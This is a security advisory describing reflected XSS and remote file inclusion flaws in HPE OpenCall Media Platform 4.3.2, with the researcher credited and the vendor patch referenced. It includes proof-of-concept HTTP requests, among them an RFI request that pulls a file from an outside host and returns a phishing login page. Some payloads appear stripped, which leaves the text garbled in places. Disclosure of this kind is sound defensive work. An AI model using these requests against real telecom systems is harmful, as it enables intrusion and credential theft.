Source: https://blogs.securiteam.com/index.php/archives/3087 SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities Want to get paid for a vulnerability similar to this one? Contact us at: ssd@beyondsecurity.com Vulnerabilities Summary The following advisory describes Reflected Cross-Site Scripting (XSS) vulnerabilities and a Remote File Inclusion vulnerability that when combined can lead to Code Execution, were found in HP OpenCall Media Platform (OCMP), version 4.3.2. HPE OpenCall Media Platform (OCMP) is a suite of software and hardware applications which allow implementation of common telecom operator services such as voicemail, sms (short message service), prepaid, billing, hlr, etc. It implements industry standard telecom protocols and standards such as SS7, ISUP, TCAP, SIP, MRCP, RTSP, and VoiceXML. HPE OpenCall Media Platform offers a highly scalable, easy-to-manage, carrier-grade media platform that adapts to future networks and applications. Through its strong support of open standards and protocols, new applications can be rapidly developed and deployed in a way that preserves investments and reduces capital expenditures (CAPEX) and operational expenditure (OPEX). There are 3 different components that are vulnerable in HPE OpenCall Media Platform (OCMP), and for each component has the following vulnerabilities: Application Content Manager Reflected Cross-Site Scripting (XSS) – /mcm/resources/ Platform Administration Tool Reflected Cross-Site Scripting (XSS) that lead to Remote Code Execution Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE0 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE1 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE2 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE3 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME0 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME1 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME2 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME3 parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NUM parameter Reflected Cross-Site Scripting (XSS) – GetMapAction function, NAME parameter Reflected Cross-Site Scripting (XSS) – cdrdispatch function, next parameter Reflected Cross-Site Scripting (XSS) – cdrdispatch function, sessionType parameter VoiceXML Administration Tool Reflected Cross-Site Scripting (XSS) – event.do function Reflected Cross-Site Scripting (XSS) – call.do function Remote File Inclusion – proxylink.do function Credit An independent security researcher Paolo Stagno from VoidSec has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. Vendor Responses HPE has released patches to address this vulnerability, for more details see: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03686en_us Vulnerabilities Details Application Content Manager – /mcm/resources/ HPE OpenCall Media Platform (OCMP) does not sanitize /mcm/resources/ “description” and “prototype” parameters input. An attacker can inject malicious Java script to trigger the Reflected Cross-Site Scripting (XSS). Proof of Concept An Attacker send the following POST request to the victims machine : POST https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?followindirection=false HTTP/1.1 Host: 127.0.0.1:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/mcm+json; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html Content-Length: 54 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache { "": "", "description": ""} The server will respond with: HTTP/1.1 204 No Content X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Date: Wed, 23 Sep 2015 16:13:35 GMT Server: Web Server Then the attacker will send the second request to trigger the Cross-Site Scripting (XSS): GET https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?format=json&followindirection=false&ms=1443024815924 HTTP/1.1 Host: 127.0.0.1:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 X-Requested-With: XMLHttpRequest Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html Connection: keep-alive The server will respond with: HTTP/1.1 200 OK X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Cache-control: no-cache Content-Type: application/json Transfer-Encoding: chunked Date: Wed, 23 Sep 2015 16:13:35 GMT Server: Web Server VoiceXML Administration Tool – call.do function HPE OpenCall Media Platform (OCMP) does not sanitize call.do function parameters input. An attacker can inject malicious Java script to trigger the Reflected Cross-Site Scripting (XSS). The vulnerable URL: /om/call.do?action=list_calls&type=XSS_HERE Proof of Concept An Attacker send the following GET request to the victims machine: GET /om/call.do?action=list_calls&type=Active637a3
Logged on as: zerpsta1                




Call Management -> Active637a3c7e9f Calls


Calls
 
Server Id CallId CDR Call Monitoring Service Id Remote-URI Local-URI Severes Warnings VoiceXML Exceptions Started At Duration
tb0ocmp1 vxi_dialog_0_32_634_3 CDR Monitor o2_ivr_0xxx sip:unavailable@unknown.invalid +1542000470521123 1 0 21 150909 19:00:52.42900:00:00.502
tb0ocmp0 vxi_dialog_0_40_420_2 CDR Monitor o2_ivr_0xxx sip:unavailable@unknown.invalid +1542000470174023 1 0 21 150908 19:29:05.23600:00:00.501
tb0ocmp1 vxi_dialog_0_32_634_2 CDR Monitor o2_ivr_0xxx sip:unavailable@unknown.invalid +1542000470852423 1 0 21 150908 19:27:56.23700:00:01.003
tb0ocmp0 vxi_dialog_0_40_420_1 CDR Monitor o2_ivr_0xxx sip:unavailable@unknown.invalid +1542000470632723 1 0 21 150907 18:57:21.54800:00:01.004
tb0ocmp1 vxi_dialog_0_32_634_1 CDR Monitor o2_ivr_0xxx sip:unavailable@unknown.invalid +1542000470277023 1 0 21 150907 15:13:19.66000:00:01.003
tb0ocmp0 vxi_dialog_0_40_420_0 CDR Monitor o2_ivr_0xxx sip:unavailable@unknown.invalid +1542000470860823 1 0 21 150907 15:12:15.25400:00:00.501
tb0ocmp0 vxi_dialog_0_32_634_0 CDR Monitor o2_ivr_3xxx sip:unavailable@unknown.invalid +1540003000009388 0 0 0 150907 15:00:13.90100:00:45.194
VoiceXML Administration Tool – event.do function HPE OpenCall Media Platform (OCMP) does not sanitize event.do function parameters input. An attacker can inject malicious Java script to trigger the Reflected Cross-Site Scripting (XSS). The vulnerable URL: /om/event.do?action=list&type=XSS_HERE Proof of Concept An Attacker send the following GET request to the victims machine: GET /om/event.do?action=list&type=Active637a3
Logged on as: zerpsta1                




Active637a3c7e9f



Events
 
Server Id Date CallId CDR Service Id Message
 
No Items Found
VoiceXML Administration Tool – proxylink.do function HPE OpenCall Media Platform (OCMP) does not sanitize proxylink.do function parameters input. An attacker can inject malicious URL to including remote files. After the attacker include the file, the HPE OpenCall Media Platform will parse and execute the content of the file. The vulnerable URL: /om/proxylink.do?url=Remote File Inclusion Here (RFI) Proof of Concept An Attacker send the following GET request to the victims machine: GET /om/proxylink.do?url=http://172.27.120.220:9595/fruuuuk.txt HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-GB User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: 172.27.116.32:5443 DNT: 1 Connection: Keep-Alive Cookie: JSESSIONID=5D8C311BBE2784FB2CE6DB970878D3CA The server will respond with: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 2565 Date: Wed, 09 Sep 2015 13:00:53 GMT PHISHING LOGIN PAGE

PHISHING LOGIN PAGE

 
User Name  
Password 
 
 
Platform Administration Tool – Reflected Cross-Site Scripting (XSS) that lead to Remote Code Execution HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch function with parameter cmd=DisplayBaseCdrBrowsePage. An attacker can inject malicious Java script to trigger the Cross-Site Scripting (XSS). Proof of Concept An Attacker send the following GET request to the victims machine: GET /OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePagef5df3